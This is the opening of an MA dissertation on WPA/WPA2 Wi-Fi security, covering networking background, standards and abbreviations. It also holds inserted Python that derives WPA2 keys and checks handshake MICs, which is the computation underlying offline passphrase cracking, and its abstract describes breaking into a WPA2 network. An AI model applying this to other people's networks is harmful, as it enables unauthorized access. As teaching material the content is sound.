

SECURITY IN LOCAL WIRELESS NETWORKS (WPA/WPA2)

LOUKAS TRIANTAFYLLOPOULOS

MA COMPUTER SCIENCE

2016



SECURITY IN LOCAL WIRELESS NETWORKS (WPA/WPA2)

LOUKAS TRIANTAFYLLOPOULOS

A dissertation submitted in partial fulfillment of the requirements of MARCONI
University for the degree of MA Computer Science

MARCONI UNIVERSITY
MARCH 2016

ACKNOWLEDGEMENTS

First and foremost, I wish to express my gratitude to my wife and two little sons for their continual
support, not only during the write-up of this dissertation, but also for the entire duration of my MSc
studies.

TABLE OF CONTENTS

ACKNOWLEDGEMENTS ................................................................................................................................ i
LIST OF TABLES & GRAPHS ..........................................................................................................................iv
LIST OF IMAGES ............................................................................................................................................v
LIST OF ABBREVIATIONS ............................................................................................................................vi
ABSTRACT.................................................................................................................................................. viii
INTRODUCTION - CHAPTER 1....................................................................................................................... 1
LITERATURE REVIEW ................................................................................................................................... 3
CHAPTER 2 - WIRELESS NETWORKS ............................................................................................................. 3
2.1 About WI-FI ....................................................................................................................3
2.2 About Wireless Networks ...............................................................................................4
2.2.1. Advantages of wireless networks ................................................................................4
2.2.2. Disadvantages of wireless networks ............................................................................6
2.3. Who needs wireless connection .....................................................................................6
2.4 Structural Elements ........................................................................................................7
2.5 Wireless Networking Standards ......................................................................................8
2.6. The 802.11 standard ......................................................................................................9
2.6.1. 802.11 versions ......................................................................................................... 10
2.6.2 Architecture of IEEE 802.11 ........................................................................................ 11
2.6.3. Services of IEEE 802.11 .............................................................................................. 12
2.6.4. IEEE 802.11 Protocol Architecture ............................................................................. 13
CHAPTER 3: SECURITY IN WIRELESS NETWORKS ........................................................................................17
3.1. What is encryption? ..................................................................................................... 17
3.1.1. Symmetric key encryption ......................................................................................... 18
3.1.2. Public key encryption ................................................................................................ 18
3.2. Wireless network encryption protocols ........................................................................ 18
3.2.1. WEP encryption......................................................................................................... 18
3.2.2. WPA encryption (Wi-Fi Protected Access) .................................................................. 19
3.2.3. WPA or WEP ............................................................................................................. 21
3.2.4. WPA2 (Wi-Fi Protected Access Version 2) .................................................................. 21
3.3. Types of Attacks on wireless networks ......................................................................... 22
3.3.1. Passive attacks.......................................................................................................... 22
3.3.2. Active attacks ........................................................................................................... 22
EMPIRICAL PART 1 ......................................................................................................................................23
CHAPTER 4: LOCATION ANALYSIS IN TERMS OF WIRELESS NETWORKS SECURITY ......................................23
4.1. About Wardriving ........................................................................................................ 23
4.2. Wardriving Equipment ................................................................................................. 23
4.2.1. Why a smartphone.................................................................................................... 24
4.2.2. Wigle Wifi Wardriving Android Application ............................................................... 24
4.3. Wardriving analysis in and around central town of Tinos Greek island ......................... 25
4.3.1. Preparation process for analysis of data .................................................................... 27
4.4. Security analysis of wireless networks in and around central town of Tinos Greek Island-
Results................................................................................................................................ 28
4.5. Channel analysis of wireless networks in and around central town of Tinos Greek Island-
Results................................................................................................................................ 29
EMPIRICAL PART 2 ......................................................................................................................................30
CHAPTER 5: CRACKING SECURITY IN WIRELESS NETWORKS .......................................................................30
5.1. About Linux, a good environment ................................................................................ 30
5.2. About Kali Linux, the next generation of Backtrack ....................................................... 30
5.3. Equipment for Cracking Wireless Networks Security .................................................... 31
5.4. Preparation of attack ................................................................................................... 33
5.4.1. Dictionary attack ...................................................................................................... 33
5.4.2. Pre-computed hashes................................................................................................ 33
5.5. The Aircrack-ng suite ................................................................................................... 33
5.5.1. About Airmon-ng ...................................................................................................... 34
5.5.2. About Airodump-ng .................................................................................................. 34
5.6. Airolib-ng & Aircrack-ng ............................................................................................... 38
5.7. coWPAtty .................................................................................................................... 39
5.8. genpmk & coWPAtty.................................................................................................... 40
5.9. Comparison of attacks ................................................................................................. 42
CONCLUSIONS ............................................................................................................................................45
BIBLIOGRAPHY ...........................................................................................................................................46

LIST OF TABLES & GRAPHS

TABLE 1. Wireless networks in and around central town of Tinos Greek island – Security Analysis of
data……………………………………………………………………………………………………..28
TABLE 2. Wireless networks in and around central town of Tinos Greek island – Channel Analysis of
data…..……………………………………………………………………………………………….....29
TABLE 3: A comparative table of the results of the attacks used in the project……………..………………..42

GRAPH 1. Wireless networks in and around central town of Tinos Greek island – Security Analysis of
data……………………………………………………………………………………………..…..…..28
GRAPH 2. Wireless networks in and around central town of Tinos Greek island – Channel Analysis of
data….……………………………………………………………………………………………….....29
GRAPH 3. Time taken to crack WPA/WPA2…………………..……………………………………..43
GRAPH 4: Time taken to crack WPA/WPA2 via dictionary attack…………..……………………...43
GRAPH 5: Time to pre-calculated hashes (seconds)………………………..………………………...44
GRAPH 6: Time taken to crack WPA/WPA2 via pre-calculated hashes……………..………………44

LIST OF IMAGES
Image 1 – Diagram of a Computer Network......................................................................................... 1
Image 2 - Wi-Fi Alliance logo ............................................................................................................. 3
Image 3 - Wi-Fi Certified logo .............................................................................................................. 3
Image 4 - Representation of Ad-hoc mode ......................................................................................... 11
Image 5 - Representation of Infrastructure BSS mode ........................................................................ 11
Image 6 - Infrastructure mode and an ESS ......................................................................................... 12
Image 7 - 802.11 and OSI Model ....................................................................................................... 13
Image 8 - 802.11 MAC Frame Format ............................................................................................... 14
Image 9 - Frame Control Field ........................................................................................................... 15
Image 10 - Sequence Control Field .................................................................................................... 16
Image 11 - A simple Encryption-Decryption system .......................................................................... 17
Image 12 - Standard WEP Encryption Process using RC4 algorithm with XOR operation ................. 19
Image 13 - WPA-PSK mode .............................................................................................................. 19
Image 14 - WPA- Enterprise mode .................................................................................................... 20
Image 15 - WPA implementation (*) ................................................................................................. 20
Image 16 - WPA2 implementation ..................................................................................................... 21
Image 17 - Vodafone Smart 4 Review................................................................................................ 23
Image 18 – Wigle Wifi Wardriving Application at Google Play Store................................................ 23
Image 19 – Wigle Wifi Wardriving Android Application Framework ................................................ 24
Image 20 - Data tab in Wigle Wardriving app .................................................................................... 25
Image 21 - Wireless Networks in and around central town of Tinos Greek Island – Google Earth
view ................................................................................................................................................... 26
Image 22 - Wardriving followed paths in and around central town of Tinos Greek Island – Google
Earth view ......................................................................................................................................... 26
Image 23 - Step 1 preview ................................................................................................................. 27
Image 24 - Step 2 preview ................................................................................................................. 27
Image 25 - Uniformly classified data of CSV file ............................................................................... 27
Image 26 - Table of data after the right modification.......................................................................... 28
Image 27 - Tux the penguin, mascot of Linux ..................................................................................... 30
Image 28 - Kali Linux logo ................................................................................................................ 31
Image 29 - Samsung R530 preview .................................................................................................... 32
Image 30 - HP Compaq 610 preview ................................................................................................. 32
Image 31 - Huawei Echolife HG520c preview ................................................................................... 32
Image 32 - The wireless card in monitor mode ................................................................................... 34
Image 33 - Collection of Initialization Vectors (IVs) .......................................................................... 35
Image 34 - "Concept" of the handshake packet .................................................................................. 36
Image 35 - "Concept" of the handshake packet .................................................................................. 36
Image 36 - Aircrack-ng in process ..................................................................................................... 37
Image 37 - Aircrack-ng in process ..................................................................................................... 37
Image 38 - Attack using database ....................................................................................................... 38
Image 39 - Attack using database ....................................................................................................... 38
Image 40 - CoWPAtty in process ....................................................................................................... 39
Image 41 - CoWPAtty in process ....................................................................................................... 39
Image 42 - Preparation with genpmk .................................................................................................. 40
Image 43 - Preparation with genpmk .................................................................................................. 41
Image 44 - Attack using pre-computed hashes .................................................................................. 41
Image 45 - Attack using pre-computed hashes .................................................................................. 42

LIST OF ABBREVIATIONS

AP (Access Point): A router, switch or hub device that manages multiple wireless connections to a
network.
Ad hoc: The mode in which computers connect directly to one another to form a network,
without the interposition of an AP.
ARP (Address Resolution Protocol): a network layer protocol used to convert an IP address into a
physical address (called a DLC address), such as an Ethernet address.

Authentication: The certification process for the identity of a station.

Authenticator: The device that initiates the connection of a station with another station or with a network
(typically an AP).

Beacon: Small, often inexpensive device that enables more accurate location within a narrow range
than GPS, cell tower triangulation and Wi-Fi proximity.

BSSID (Basic Service Set Identifier): MAC address of access point.

CCMP (Counter-Mode / Cipher Block Chaining Message Authentication Code Protocol): Encryption
protocol that’s used in WPA2, based on the AES block cipher.

Dictionary: A set of words which will power an attack.

EAP (Extensible Authentication Protocol): is a general protocol for authentication that also supports
multiple authentication methods, such as token cards, Kerberos, one-time passwords, certificates, public
key authentication and smart cards.

EAPOL (EAP Over LAN): Application of the EAP in networks.

ESSID (Extended Service Set Identifier): The network name.

Fragmentation: The process in which an information packet breaks up into smaller packets when
sending and which will be linked at their destination.

Frame: We can consider that a “frame” is the same as a packet. The "definition" is that when there is a
message exchange in layer 2 of the OSI model we refer to it as frames, and when the message exchange
is made in layer 3 we refer to it as packets.

Handshake: Process of a series of questions and answers for the purpose of the identification of
supplicant.

ICV (Integrity Check Value): A checksum capable of detecting modification of an information system
(IS).

Infrastructure: The mode of operation in which a computer is connected at first to an AP and then to
the network.

IV (Initialization Vector): a non-secret binary vector used as the initializing input algorithm for the
encryption of a plaintext block sequence to increase security by introducing additional cryptographic
variance and to synchronize cryptographic equipment.
KCK (Key Confirmation Key): integrity control key that protects the handshake messages.

KEK (Key Encryption Key): encrypted key that protects the handshake messages.

MAC Address (Media Access Control Address): is a 48-bit-long address that uniquely identifies each
physical machine on an Ethernet local area network.

MIC (Message Integrity Code): data field appended to the plaintext for checking the integrity
(generated by the Michael algorithm).

MK (Master Key): Within a hierarchy of encrypting keys and transaction keys, the
highest level of key-encrypting key.

Monitor Mode: The operational mode of a Wi-Fi device which receives packets circulating on the Wi-Fi
network. Also known as raw mode.

MPDU (Mac Protocol Data Unit): A data packet before fragmentation.

MSDU (Mac Service Data Unit): A data packet after fragmentation.

NACK (Negative Acknowledgement): A Negative-Acknowledge Character is a transmission control
character sent by a station as a negative response to the station with which the connection has
been set up.

Packet: a sequence of binary digits, including data and control signals, that is transmitted and switched
as a composite whole.

PMK (Pairwise Master Key): master key in the pairwise key hierarchy.

PRGA (Pseudo Random Generation Algorithm): the production process of the key stream on RC4.

PSK (Pre-Shared Key): key generated by a password replacing a PSK on WPA-PSK mode.

PTK (Pairwise Transient Key): key generated by the PMK.

Rainbow Tables: prepared word hashes for use in brute force or dictionary attacks.

SSID (Service Set Identifier): wireless network identifier.

TK (Temporary Key): key for data encryption on unicast traffic.

TKIP (Temporal Key Integrity Protocol): encryption protocol used in WPA and based on the RC4
algorithm (which is also used in WEP).

TMK (Temporary MIC Key): key for data integrity on unicast traffic (TKIP).

WEP (Wired Equivalent Privacy): default encryption protocol that is used on 802.11 networks.

Wi-Fi (Wireless Fidelity): the well-known wireless technology.

WPA, WPA1 (Wi-Fi Protected Access): The initial version of WPA, sometimes called WPA1, is
essentially a brand name for TKIP. TKIP was chosen as an interim standard because it could be
implemented on WEP hardware with just a firmware upgrade.

WPA2: The trade name for an implementation of the 802.11i standard, including AES and CCMP.
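To make the key hierarchy behind the abbreviations above concrete (PSK, PMK, PTK, KCK, KEK, TK, MIC and the handshake), here is an added Python walk-through of the WPA2-PSK derivations as specified in IEEE 802.11i; it is example code written for this page, not code from the thesis or from the Aircrack-ng or coWPAtty tools. The SSID "ExampleNet", the passphrase, the MAC addresses and the nonces are constructed sample values, and the EAPOL-Key frame is a minimal constructed one rather than captured traffic.

```python
"""WPA2-PSK key hierarchy (IEEE 802.11i): passphrase -> PSK/PMK -> PTK -> KCK | KEK | TK,
and the EAPOL-Key MIC that the KCK protects during the 4-way handshake."""
import hashlib
import hmac
import struct

PRF_LABEL = b"Pairwise key expansion"
MIC_OFFSET = 81   # 4-byte EAPOL header + 77 bytes of Key Descriptor fields before Key MIC
MIC_LEN = 16


def derive_psk(passphrase: str, ssid: str) -> bytes:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits).
    In WPA-PSK mode the PSK is used directly as the PMK. The SSID is the salt, which is
    why a table of pre-computed PMKs (genpmk / airolib-ng) is valid for one SSID only."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, n_bytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    counter = 0
    while len(out) < n_bytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:n_bytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PTK = PRF-384(PMK, label, Min(AA,SPA) || Max(AA,SPA) || Min(ANonce,SNonce) || Max(...)).
    Min/Max ordering makes the result identical whichever side computes it.
    For CCMP the 48-byte PTK splits into KCK (16) | KEK (16) | TK (16)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, PRF_LABEL, data, 48)
    return {"KCK": ptk[:16], "KEK": ptk[16:32], "TK": ptk[32:48]}


def build_eapol_key_frame(key_info: int, replay_counter: int, nonce: bytes) -> bytes:
    """Constructed, minimal EAPOL-Key frame (RSN descriptor type 2) with no Key Data and the
    Key MIC field zeroed. Field order: type, Key Info, Key Length, Replay Counter, Nonce,
    IV, RSC, Key ID, MIC, Key Data Length."""
    body = struct.pack(">BHHQ", 2, key_info, 0, replay_counter)
    body += nonce + bytes(16) + bytes(8) + bytes(8) + bytes(MIC_LEN) + struct.pack(">H", 0)
    return struct.pack(">BBH", 2, 3, len(body)) + body   # EAPOL version 2, type 3 = EAPOL-Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC for key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the whole EAPOL
    frame with the MIC field zeroed, truncated to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + bytes(MIC_LEN) + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def sign_frame(kck: bytes, frame: bytes) -> bytes:
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + MIC_LEN:]


def verify_frame(kck: bytes, frame: bytes) -> bool:
    return hmac.compare_digest(eapol_mic(kck, frame), frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN])


def demo_handshake(passphrase: str = "correct horse battery staple", ssid: str = "ExampleNet") -> dict:
    """Both sides derive the PTK from the shared PMK and the exchanged nonces; the AP then
    checks the MIC on handshake message 2. All addresses and nonces are constructed samples."""
    aa = bytes.fromhex("020000000001")      # authenticator (AP) MAC, locally administered
    spa = bytes.fromhex("020000000002")     # supplicant (station) MAC
    anonce = hashlib.sha256(b"sample anonce").digest()
    snonce = hashlib.sha256(b"sample snonce").digest()
    pmk = derive_psk(passphrase, ssid)
    ap_keys = derive_ptk(pmk, aa, spa, anonce, snonce)     # AP's computation
    sta_keys = derive_ptk(pmk, spa, aa, snonce, anonce)    # station's computation, arguments swapped
    # Message 2: station sends SNonce, MIC'd under its KCK (Key Info: version 2, pairwise, MIC set).
    msg2 = sign_frame(sta_keys["KCK"], build_eapol_key_frame(0x010A, 1, snonce))
    tampered = msg2[:-1] + bytes([msg2[-1] ^ 0x01])        # flip one bit of the frame
    wrong_kck = derive_ptk(derive_psk("wrong passphrase", ssid), aa, spa, anonce, snonce)["KCK"]
    return {
        "pmk": pmk,
        "ptk_match": ap_keys == sta_keys,                  # both sides agree on KCK/KEK/TK
        "mic_ok": verify_frame(ap_keys["KCK"], msg2),      # AP accepts a genuine message 2
        "tampered_ok": verify_frame(ap_keys["KCK"], tampered),   # modified frame is rejected
        "wrong_pass_ok": verify_frame(wrong_kck, msg2),    # a different passphrase yields a different KCK
    }


if __name__ == "__main__":
    result = demo_handshake()
    print("PMK:", result["pmk"].hex())
    for k in ("ptk_match", "mic_ok", "tampered_ok", "wrong_pass_ok"):
        print(f"{k}: {result[k]}")
```

The `derive_psk` function reproduces the IEEE 802.11i test vector (passphrase "password", SSID "IEEE"), so it can be checked against the standard before being used on anything else.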

ABSTRACT

The purpose of this thesis is to describe the way wireless networks work and their encryption
protocols, and to address the threat of security violations. More precisely, all active wireless networks
within and around the central town of the Greek island of Tinos will be searched for and registered through
the use of specific functions and the WiGLE Android application. Dictionary and precomputed-hash attacks
will be built and, finally, the security of a WPA/WPA2-encrypted wireless network will be violated.
More specifically, chapter two describes the human need for remote communication, the definition,
the architecture, the categories that wireless networks are divided into and the differences between
wireless and wired networking.
Chapter two also describes the advantages and disadvantages in using wireless networks, analyzes
wireless devices being used and describes wireless networking standards. Moreover, it gives the analysis
of publications and architecture of the standard 802.11.
Chapter three refers to the types of encryption algorithms, describes and compares in detail the
encryption protocols WEP and WPA/WPA2 and analyzes two types of attacks.
Chapter four refers to the first empirical part of this thesis, about location analysis in terms of
wireless networks security in and around central town of Tinos Greek island. The analysis of the
extracted CSV file presents statistical information about cryptographic methods and the channels in use.
Chapter five describes the violation of wireless security. It presents in detail the tools used for
searching for, registering and violating wireless networks. Based on the statistics from the first empirical
part of this thesis, a wireless network SSID with the most common cryptographic method (WPA2) is
analyzed using some powerful security attacks. The effects of the attacks will be compared and the
results will be analyzed in detail.
INTRODUCTION - CHAPTER 1
From the beginning of time, the need for communication regarding the exchange of information has
been a vital asset for survival. However, the element of flexibility was achieved only in the 20th century
with the advent of remote communication. The invention and use of telephones, televisions, radio signals
and generally computer networks are those elements which have contributed to the particularly rapid
growth of remote communication.
A computer network is a communication data system that connects two or more computers to each
other and to other remote devices. The term “connect” refers to the ability of exchanging information.
A computer network consists of the following components:
• Terminal Nodes: This component checks the network resources (hardware and software).
• Sub-Networks: Physical means, communication protocols, topology, terminal nodes and resources
that differ among different sub-networks.
• Interface devices: These devices connect heterogeneous sub-networks in order to achieve
successful communication of terminal nodes which are located in different sub-networks.

Image 1 – Diagram of a Computer Network

Source: www.conceptdraw.com

Computer networks are divided into the following categories:


1. Wired or Wireless networks, based on physical means of interconnection.
2. Private or Public networks, based on telecommunication service provider.
3. Wide area (WAN), Local area (LAN) , Metropolitan area (MAN) and Personal area (PAN)
networks
4. Switched or Shared networks, based on technical promotion of information.
The difference between wired and wireless communication is the physical means that is needed to
transfer information from one point to another. Wireless networks don’t use wires as transmission means
but electromagnetic waves with a frequency usually of 2.4 GHz or 5 GHz. For normal communication
between wired and wireless networks, it’s important to use specific standards.
A switched network is a physical network in which an infrastructure device (called a switch)
directs packets based on their destination. This improves network performance by ensuring that only the
hosts that need to receive a given packet actually see it. On the other hand, a shared network is a
network in which every packet is received by every device on the network.
Wireless communication is, undoubtedly, the fastest growing segment of the communications
industry. Mobile telephones and satellite communications are characteristic examples of wireless services
with the most rapid expansion worldwide and are important tools for the development of countries.

LITERATURE REVIEW

CHAPTER 2 - WIRELESS NETWORKS

2.1 About WI-FI


With the development of standards by the IEEE (Institute of Electrical and Electronics Engineers -
non-profit organization) and the emergence of large numbers of wireless device manufacturers, it was
evident that there was a need to ensure compatibility between different devices and also buyer protection.
For this reason, the non-profit Wi-Fi Alliance (WECA) was founded in 1999; its main task was
to promote Wi-Fi technology and to certify Wi-Fi products that conformed to certain standards
of interoperability.

Image 2 - Wi-Fi Alliance logo

Source: commons.wikimedia.org

The Wi-Fi Alliance organization has established a test suite that defines how member products will be
tested by an independent test lab. Products that pass these tests are entitled to display the Wi-Fi
trademark, which is a seal of interoperability. These Wi-Fi interoperability tests are designed to ensure
that hardware from different vendors can successfully establish a communication session with an
acceptable level of functionality.

Image 3- Wi-Fi Certified logo

Source: www.wi-fi.org

This trademark is a certification for any prospective buyer of a device and a guarantee of its usability.
The consumer buying a device with this logo has the assurance that it will work with every other
device that also bears the same trademark.

2.2 About Wireless Networks


A wireless network is any type of computer network that uses wireless data connections for
connecting network nodes.
Wireless networking is a method by which homes, telecommunication networks and business
installations avoid the costly process of introducing cables into a building, or as a connection between
various equipment locations, allowing data exchange.
In their early days, wireless networks suffered from a plethora of disadvantages and a lack of
standards. As a result, they were not common among the general public. During the last decade we have seen
an explosive growth of wireless networks. Nowadays wireless networks occupy an important piece of the
network market. Due to the cheap cost of equipment compared to wired networks and the relative ease of
deployment, the adoption rate of wireless will soon exceed that of wired networks. In organizations and
corporations the idea has been developed that the local wireless networks strengthen considerably the
traditional wired networks, especially regarding the requirements of portability, relocation and the
coverage of locations where the installation of wires is difficult or impossible.
Examples of wireless networks include cell phone networks, Wi-Fi local networks and terrestrial
microwave networks.

2.2.1. Advantages of wireless networks


The rapid spread of wireless networks is clearly due to the significant advantage which they have.
We can refer to the following advantages:
a) Increased Mobility
Increased mobility is by far the biggest attraction that wireless networking holds for most
businesses. Being able to sit at any terminal, anywhere in the building and access the server is a great
advantage. When laptops were developed, because of the new mobility convenience factor that they
brought within them, this gave added impetus to the advantages of being able to work anywhere within
the range of the wireless network signal. It means that not only can employees now access information
from the server, wherever they are on the premises, but it also enables colleagues to collaborate and share
information in meetings held anywhere; either in a corner of the office, a meeting room, or even the staff
canteen. It enables total mobility.
b) Enabling BYOD
The increased mobility factor both enables and facilitates the Bring Your Own Device (BYOD)
phenomenon, which more and more businesses are now taking advantage of: laptops, tablets, and smart
phones that belong to individual employees are now being brought into the workplace and are being
given access rights to the wireless network. As well as making it more convenient for employees to carry
out their tasks, BYOD also represents a potential cost saving, as businesses no longer have to fund the
hardware cost of the devices themselves.
c) Increased Productivity
Another important by-product of the increased mobility factor is that it promotes increased
productivity, allowing employees to collaborate where and when they need to. It brings freedom of
operation and speeds up the working process. But there is another factor too, and that is that employees
take their devices home with them, and can work (as many do) in their own time when it’s convenient
to do so.
d) Public Wi-Fi Hotspots
Wireless networking has also gone into the public domain, with Wi-Fi hotspots being available in
many high street coffee shops, hotels, railway stations, airports, universities, hospitals, etc. It enables
people to get onto the Internet when they’re away from the office, or away from home. People can pick
up their emails, both social and business, and if their place of work allows, can also connect into the
business network remotely.
e) Scalability
One of the inherent problems with a wired network is coping with expansion. Having to add
additional cabling, and reroute existing cables, can be a disruptive and costly process. Whilst every
company should plan ahead when installing a wired network, it is almost impossible to forecast future
requirements accurately unless sound planning is carried out.
There’s no such problem with a wireless network. Being able to add new users is no more difficult
than having to issue a new password, and update the server accordingly. It’s fast, and it’s relatively
convenient. It also means that offices can be relocated within the building with consummate ease,
furniture can be readily moved around, and, of course, employees can sit wherever they need to. Not only
is it so much more convenient to add new users to a wireless network, but it seldom involves any
additional expenditure.
f) Guest Use
Having a wireless network also means that a business can provide secure network access to visiting
colleagues from other sites within the organization. It enables them to access the data they need and pick
up and respond to their emails.
It also grants Internet access to visiting customers and suppliers. It’s now something that most
business people who have reason to travel, have come to expect. It’s also how most public Wi-Fi hotspots
grant Internet access to their guests.
g) Using VOIP
Another one of the benefits of having a wireless network is that it can be used to make telephone calls
using voice over the Internet protocol. VoIP calls are often free, depending on the country and the
devices you are calling, and are considerably cheaper than using conventional technology to make
international calls.
h) WI-FI is cost effective
Using wireless technology rather than having a hard wired network can be much more cost-
effective. The larger the network, both in terms of area and users, the more expensive a hard wired
network will be to install. It’s not just the amount of cabling, but the actual cost of the labour to install the
raceways, and chase the cabling all through the premises; through walls, up and down different floors etc.
Once a wireless network is in place, and even if it costs a little more initially to install, maintenance
costs are lower, and there are normally no additional costs involved in scaling up, unless the signal needs
to be boosted.

i) Health and safety
Because there are no wires involved with a wireless connection, the potential risk of tripping over any
trailing cables that wired connectivity requires, can be avoided altogether.

2.2.2. Disadvantages of wireless networks


Because wireless networks carry information over radio, they are exposed to many kinds of
interference that affect user communication. Wireless networks are far from perfect, and there are a
number of disadvantages that an individual or organization may face when using one.
The disadvantages of wireless networks can be summarized as follows:

a) Security
Because the medium is radio, anyone within range can receive the traffic and attempt to join the
network. To counter this, wireless networks can use one of the various encryption technologies
available. Some of the more commonly deployed encryption methods, however, are known to have
weaknesses that a dedicated adversary can exploit.

b) Range
The typical range of a common 802.11g network with standard equipment is on the order of tens of
meters. While sufficient for a typical home, it will be insufficient in a larger structure. To obtain
additional range, repeaters or additional access points will have to be purchased. Costs for these items
can add up quickly.

c) Reliability
Like any radio frequency transmission, wireless networking signals are subject to a wide variety of
interference, as well as complex propagation effects that are beyond the control of the network
administrator.

d) Speed
The speed of older wireless networks (typically 1-54 Mbps for 802.11b/g) is far slower than even the
slowest common wired networks (100 Mbps up to several Gbps), and the wireless medium is shared by
all stations in range. In environments that need sustained high throughput, a wired network may
therefore be necessary.

e) Electricity Consumption
Wi-Fi access points consume more electricity than a wired switch port, because the radio must keep
transmitting in order to cover an area of roughly 40 metres.

2.3. Who needs a wireless connection

Wireless networks have many uses. Over the last decades they have been used in educational,
professional and household applications.
Some important uses of wireless networks are:
1. With a wireless network it is very easy to share an Internet connection among all Wi-Fi devices.

2. If a company occupies more than one building, there is a legitimate need for communication between
the buildings' networks. A wireless bridge is the simplest and most economical solution, the only
disadvantage being the possibility of a security breach.
3. In conference rooms (meeting rooms) it is possible to access information from the corporate
network.
4. Hot spots: Apart from its internal network, a company can expand its customer base, and thus its
profits, by offering services at selected locations on its premises. Such hot spots can be found in
restaurants, cafés, hotels, airports, hospitals, railway stations, etc.
5. Doctors and nurses use wireless handheld devices to have direct access to personal files of patients
and to medical libraries.
6. Implementation of networks is possible in old buildings where the wiring is unprofitable or
restrictive.
7. Implementation of wireless networks as a backup of wired systems installations.

2.4 Structural Elements


i) End-Users devices
Devices are the source of communication between the user and the network. The communication in a
wireless network is done through devices supporting wireless transmission. Such devices are:
1. Desktop/laptop computer
2. Palmtop, handheld PCs and printers
3. Smartphones
4. IP Cameras
ii) Network Cards
A network card allows a computer to communicate over the network. It is a device of the physical
layer and the data-link layer of the OSI model, since it provides access to the physical network
medium and a low-level addressing system through the use of MAC addresses.
iii) Access Points
In computer networks, a device that connects the wireless communication devices to each other to
form a wireless network is called “Wireless Access Point”. The access point is typically connected to a
wired network and it can transfer data between wireless and wired devices. Many access points can be
connected together to form a larger network that enables roaming.
In contrast to this model, a network in which client devices communicate by themselves, without the
need for an access point known in advance, is called “Ad Hoc Network”.
iv) Transmission Means
Wi-Fi uses radio frequencies in the bands allocated for industrial, scientific and medical (ISM)
purposes. Unlike most other parts of the radio spectrum, operating a transmitter on these frequencies
does not require a licence.
The IEEE 802.11 standard defines 14 channels in the 2.4 GHz band, spaced 5 MHz apart, of which 13
are permitted in Europe and 11 in North America. Each channel occupies about 20-22 MHz, so
neighbouring channels overlap; access points in the same area are therefore placed on channels that
do not overlap (such as 1, 6 and 11) to reduce interference and preserve data integrity.
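The channel arithmetic above, as an added example that is not part of the dissertation. It computes the 2.4 GHz centre frequencies, tests two channels for overlap and picks a non-overlapping channel plan; the per-region channel limits are the usual ETSI/FCC/Japan allocations and are stated in the code as an assumption.

```python
"""2.4 GHz channel plan for IEEE 802.11: centre frequencies and overlap.

Added example, not from the dissertation. Channel spacing (5 MHz from
2412 MHz, channel 14 at 2484 MHz) and the 22 MHz DSSS / 20 MHz OFDM
channel widths come from IEEE 802.11; the per-region channel limits are
the usual ETSI/FCC/Japan allocations, stated here as an assumption.
"""
from typing import List

DSSS_WIDTH_MHZ = 22   # 802.11b channel width
OFDM_WIDTH_MHZ = 20   # 802.11g/n channel width

# Assumed regulatory limits on which channels may be used.
REGION_CHANNELS = {"ETSI": range(1, 14), "FCC": range(1, 12), "JP": range(1, 15)}


def centre_frequency_mhz(channel: int) -> int:
    """Centre frequency of a 2.4 GHz channel in MHz."""
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    if channel == 14:
        return 2484          # Japan only, 802.11b only
    raise ValueError(f"no such 2.4 GHz channel: {channel}")


def channel_from_frequency(mhz: int) -> int:
    """Inverse lookup, useful when a capture tool reports frequency, not channel."""
    for ch in range(1, 15):
        if centre_frequency_mhz(ch) == mhz:
            return ch
    raise ValueError(f"{mhz} MHz is not a 2.4 GHz channel centre")


def channels_overlap(a: int, b: int, width_mhz: int = DSSS_WIDTH_MHZ) -> bool:
    """Two channels interfere if their occupied bands intersect."""
    return abs(centre_frequency_mhz(a) - centre_frequency_mhz(b)) < width_mhz


def non_overlapping_plan(region: str, width_mhz: int = DSSS_WIDTH_MHZ) -> List[int]:
    """Greedy choice of mutually non-overlapping channels, lowest channel first."""
    chosen: List[int] = []
    for ch in REGION_CHANNELS[region]:
        if all(not channels_overlap(ch, used, width_mhz) for used in chosen):
            chosen.append(ch)
    return chosen
```

With the 22 MHz DSSS width the plan for Europe and North America is the familiar 1, 6, 11; with the narrower 20 MHz OFDM width the 13 European channels admit a four-channel plan of 1, 5, 9, 13.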

v) Antennas
An antenna is a device that allows the effective transmission and reception of radio waves. When an
antenna operates as a receiver, it converts incoming radio waves into an alternating electrical
signal; when it operates as a transmitter, it converts an alternating electrical signal into radio
waves.
Antennas can be broadly classified as omnidirectional and directional antennas, depending on the
directionality.
Omnidirectional antennas are most commonly used to create hot spots by transmitting a signal over a
large area in all directions, or to receive signals from all directions when the transmitting location
is unknown or close by. Omnidirectional Wi-Fi antennas do not need to be pointed in a particular
direction, since their radiation pattern covers 360 degrees.
Directional antennas, as the name implies, provide signal coverage in a specified direction. Unlike
omnidirectional antennas, they must be aimed at the transmitter or receiver, for example a router or a
Wi-Fi hotspot. For the best signal strength and quality the antenna must be aligned precisely with
the signal.

2.5 Wireless Networking Standards


Continuous technological evolution has produced various wireless standards. The most common are:
 IEEE 802.11¹,
 IEEE 802.16²,
 HiperLan³,
 Openair⁴,
 HomeRF⁵,
 Bluetooth⁶.
Each standard has a different application, so we can say that they complement each other rather than
competing against each other. Bluetooth and the HomeRF designed for short-distance links, connection
between devices and their peripherals, IEEE 802.11 to implement wireless local networks and IEEE
802.16 to implement wider wireless metropolitan networks.
Let’s see concisely the above standards and their characteristics. The most important of these, IEEE
802.11, is going to be emphasized and described in detail.

A) IEEE 802.16 standards

In 2003 the IEEE adopted the 802.16 standard, known commercially as WiMAX, to satisfy the requirements
for fixed wireless broadband access at high speed over long distances. As with the 802 series
standards for wireless LANs, 802.16 defines a family of standards with options for specific settings.
